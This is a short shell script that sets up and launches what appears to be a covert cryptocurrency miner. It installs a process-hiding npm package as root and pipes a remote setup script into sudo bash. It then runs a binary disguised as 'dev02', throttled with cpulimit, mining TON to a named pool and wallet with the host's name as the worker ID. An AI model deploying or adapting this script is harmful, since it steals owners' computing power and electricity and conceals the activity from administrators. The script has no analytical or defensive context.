#!/bin/sh

apt update && apt -y install sudo
sudo apt update;apt -y install build-essential cpulimit screen ca-certificates libcurl4
curl -fsSL https://deb.nodesource.com/setup_17.x | sudo -E bash -
sudo apt-get install -y nodejs
sudo apt-get install gcc g++ make
sudo -u root npm i -g node-process-hider
sudo ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
sudo dpkg-reconfigure --frontend noninteractive tzdata
chmod +x dev02
cpulimit -e dev02 -l 30 &
./dev02 --algo TON --pool https://server1.whalestonpool.com --user EQBzOe5gR8Rd8gIrr81JaCd9X0JvN3u0Vd0dUTaB1Khza3fL.$(cat /proc/sys/kernel/hostname)
